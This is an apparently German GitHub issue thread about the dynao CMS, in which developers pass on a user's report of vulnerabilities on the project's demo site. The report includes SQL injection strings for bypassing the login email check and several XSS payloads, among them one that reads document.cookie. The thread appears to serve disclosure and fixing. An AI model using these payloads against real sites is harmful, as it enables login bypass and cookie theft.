Closed aaroniker closed 10 years ago
Dann liegt wohl noch eine alte Datei aufm Server: https://github.com/callofsorrow/dynao-CMS/blob/master/admin/lib/classes/user/login.php#L74 Beim Update haben wir das Escape doch reingehauen ;)
ah da sachste wat :D habs in der demo hinzugefügt
XSS besteht weiterhin ;) müssen da noch aufpassen
hab folgendes von nem Benutzer bekommen:
Also:
http://demo.dynao.de/admin/index.php?page=dashboard POST Exploit Login "Bypass". Konnte nur Emailabfrage umgehen, PW muss trz. gecracked werden. Einfach [String] durch die Strings ersetzen.
Post: email=[String]&password=[String]&login=
x" or "x"="x " or "x"="x " or 0=0 # " or "a"="a sqlinject" or "a"="a
XSS Lücke: Cross Site Scripting
"><script>alert(/XSS/);</script> "><script>alert(1);</script> "><script>alert('XSS');</script> "><script>alert("XSS");</script> "><script>alert(document.cookie);</script>
usw.